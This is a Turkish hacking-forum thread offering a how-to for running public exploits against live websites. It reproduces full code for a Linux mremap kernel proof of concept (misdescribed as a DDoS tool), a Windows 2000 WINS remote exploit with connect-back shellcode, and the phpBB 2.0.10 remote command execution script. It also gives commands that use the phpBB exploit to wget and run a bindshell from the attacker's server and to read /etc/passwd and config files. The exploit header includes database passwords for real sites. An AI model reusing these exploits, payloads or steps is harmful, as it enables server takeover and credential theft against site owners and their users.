Exploit döküman (geniş anlatım)

GLOBAL34

Katılımcı Üye
29 Eyl 2006
327
0
dünyadan
exploit nedir:
kısa olarak shell :uzaktaki servera bir bilgisayara bağlanarak o bilgisayarı kısıtlı haklarla kendi bilgisayarımız gibi kullanmamıza yarar. telnet gibi kullanarak bağlanabiliriz..


telnet kendimiz putty kullanarak bağlandık sisteme exp kullanarak kendimize bir port açtık ve putty le bağlandık..





exploit c dilinde yazylyrlar az sayyda perl dilinde yazılmıştır
yazıldıkları dilere göre uzuntıları farklıdır.
c dilinde yazyldyysalar *.c perl'de yazılmışsa *.pl uzantılıdır. .
exploit kullanmak içinshell yada active perl yada daha farklı derliyici lazım
genelde exploiti kullanmak için sistemin yapısına bakmamız lazım yani bulduğumuz açık o sisteme uyuyorsa sistemizden exp derleyip sisteme root olmanın imkanlarını ararız. sistemin işletim sistemi, sunucusu ve versiyonunu tespit etmenin yolu netcraft dır.
www.netcraft.com adresinden hedef sitenin adı girilerek bu bilgiler elde edilir elde ettiğimiz bilgiye göre bulduğumuz exploitde aratırdığımız sistem özelliklerine uyan bir yer varmı tespit ederiz.exploitleri bulabileceğiniz siteler.

www.phreak.org/html/exploits.shtml
http://www.k-otik.com/exploits/
www.packetstormsecurity.nl

linux shell deysek # bu işaret çıkar elimizde perl exp loiti olduğunu varsayıyorum win de dosyaların içeriklerii edit çekiyorsak bunda pico kullanarak içeriğini görebilirsiniz..

#pico as.pl
içeriğini gördük ctrl+x yaptık ve çıktık
#chmod +x as.pl
derleme ok!
-------
#./as.pl
yada olmazsa
#/as.pl
deneyin artık çalışır halde exp

indirdiğiniz exploitin içinde nasıl kullanılacağı yazıyordur onun için kullanım hakında soru sormayın içinde yazıyor

#perl as
www.kayserituning.com/forum/index.php 66666
saldırımız başladı.... örneklerimiz gerçektir.
--------------
c leri derleme
c'derlemede gcc -o exploit ve exploitadı.c seklinde exploiti derleyip çalıştırma haline getiriyoruz...

shell'e 2 girdik

ddos yapıyoruz programla deil shell olarak

#pico mremap_poc_2.c
kodunu gösterdi içeriğini
-----------------------
$ gcc -W -Wall mremap_poc_2.c && ./a.out
mmap: Cannot allocate memory
created ~65530 VMAs
now mremapping 0x3FFE5000 at 0x3FFE1000
Segmentation fault



$ dmesg | tail -n 16
kernel BUG at mmap.c:1194!
invalid operand: 0000
CPU: 0
EIP: 0010:[<c01239b5>] Not tainted
EFLAGS: 00010287
eax: 3ffe2000 ebx: ce189f80 ecx: ce189f38 edx: ce189f20
esi: ce189fc4 edi: ce189f04 ebp: ce189ec0 esp: cf101f44
ds: 0018 es: 0018 ss: 0018
Process a.out (pid: 5371, stackpage=cf101000)
Stack: ce189f80 ce189fc4 ce189f04 3ffe1000 3ffe1000 c012873f cf1b66e0 c01287c7
cf1b66e0 ce189ec0 cf100000 00001000 cf1b66fc ffff0001 cf1b66e0 00000000
c339df1c ce189ec0 cf100000 fffffff4 ce189e60 c0128896 3ffe5000 00001000
Call Trace: [<c012873f>] [<c01287c7>] [<c0128896>] [<c01086b3>]

Code: 0f 0b aa 04 21 f9 2d c0 8b 7c 24 10 8b 74 24 14 8b 5c 24 18



$ cat mremap_poc_2.c

/*
* Proof-of-concept exploit code for do_mremap() #2
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED

#define __NR_real_mremap __NR_mremap

static inline _syscall5( **** *, real_mremap, **** *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, **** *, new_address );

#define VMA_SIZE 0x00003000

int main( **** )
{
int i, ret;
**** *base0;
**** *base1;

i = 0;

while( 1 )
{
i++;

ret = (int) mmap( (**** *)( i * (VMA_SIZE + 0x1000) ),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

if( ret == -1 )
{
perror( \"mmap\" );
break;
}

base0 = base1;
base1 = (**** *) ret;
}

printf( \"created ~%d VMAs\\n\", i );

base0 += 0x1000;
base1 += 0x1000;

printf( \"now mremapping 0x%08X at 0x%08X\\n\",
(int) base1, (int) base0 );

real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );

printf( \"kernel may not be vulnerable\\n\" );

return( 0 );
}
--------------------

gcc -W -Wall mremap_poc_2.c

yazdık derlendi ve çaılışır halde kodun başında yazıyor zaten nasıl yapılacağı arkadaşlar şimdi

#./a.out ipadres 6667

başladı ddos

--------------------------------------------------------------------------

windows 2000 kullanan server lar için exp c de yazılmış

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <[email protected]> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\ x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
**** usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("
[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("
[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("
[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

**** usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit
www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win
www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde selametle kalın...

 

GLOBAL34

Katılımcı Üye
29 Eyl 2006
327
0
dünyadan
===========exploit döküman phpbb 2.10===============
========================================================
===========php BB 2.10 exp=======================

Arkadaşlar ilk başta gerekli programların linklerini veriyim
1-activeperl ( bu program win ortamında perl çalıştırılmasını sağlar)
2- Exploit CODE [
http://www.k-otik.com/exploits/20041...pbb2010.pl.php]

arkadaşlar bu kodu alıp .pl diye kaydedin sonra activeperli çekin
kurarken ilk install.bat var onu çlaıştırın yönergeleri izleyin biraz uzun sürcek ama bekliceksiniz artık

daha sonra c:/perl içine kurar default olarak siz exploit.pl dosyasını c:/perl/bin içine atın

msdosa geçin cd c:/perl/bin yazın perl exploit.pl yazın exploit çalısaktır

ama ne halta yarar bu ?

1- bikere config dosyalarını felam çalabilirsiniz cat config.php komutuyla oluyo cat unix makinalarda görüntüleme anlamaına gelir
bu bilgileri aldıktan sonra Db ile bağlantı kurup oynayabilirsiniz siteyle ( elinizde mysql client felam varsa onunla dblere bağlantı kurabilirsinz)

2- 1. kısmı direk geçiyorum daha önemli bilgiler veriyim onun yerine

komut satırından gösterek anlatayım

################################################## ##########
usage:
r57phpbb2010.pl [DIR] [NUM] [CMD]
params:
- server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or \"ls -la\"
################################################## ##########

c:/perl/bin içindeyken perl exploit.pl derseniz bu satır karşınıza çıkar

perl exploit.pl www.ornek.com / yada /phpbb2/ daha sonra herhangi bir topic idsini yazıyoruz

en son \"unix command atıyoruz\"

ls -la dosya listeleme anlamına gelir

mesela ca cd /;cat etc/passwd yaparak passları alabilirsiniz


----------------------------------
size makinada port nasıl açılır nasıl makina rootlanır

perl exploit.pl.pl www.ornek.com / 1 \"cd /;cd tmp;wget www.seninmakinan.com/bindshelldosyasi;chmod +x bindshelldosyasi;./bindshelldosyasi\"

şimdi burda ne yaptık sırayla anlatayım
ilk sistemi exploitledik daha sonra / dizinine indik tmp içine girdik kendi hostunuzdan bindshell dosyasını çektik chmod ayarını yaptık ve çalıştırdık

bindshell kodu için link vereyim bi allahın host veririse koyarız oraya

telnet www.ornek.com 1666 şeklinde telnetle yada başka clientlerle girebilirsinz geriye rootlamak kalıyo makinayı


exploiti yazmayı unutmuşum

#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/3...7/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with
## nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

if (@ARGV < 4)
{
print q(################################################ ######
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.****.ru
################################################## #########
usage:
r57phpbb2010.pl [DIR] [NUM] [CMD]
params:
- server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
################################################## #########
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n ";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20' ;
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%4 8%54%54%
50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29 .%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",
PeerPort => "80") || die "[-]
CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n ";

### EOF ###

http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php

 

sLayEr

Özel Üye
2 Ara 2006
781
5
İstanbul

daha sonra c:/perl içine kurar default olarak siz exploit.pl dosyasını c:/perl/bin içine atın

msdosa geçin cd c:/perl/bin yazın perl exploit.pl yazın exploit çalısaktır

dostum c:/perl/bin perl exploitadı.pl
die yazmıssın ama adamler perl'e nasıl gecicek ordan bin'e nasıl giricekler..onu sölememişsin..bari onuda ben resimli anlatayım:)..
aard4.jpg


C:\Perl\bin>perl exploitadı.pl

ÖrNEğiN: C:\Perl\bin>perl x.pl resimdeki gibi exploitime "x" adını verdim ve x.pl seklinde uzantısı ile beraber yazıoruz..
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.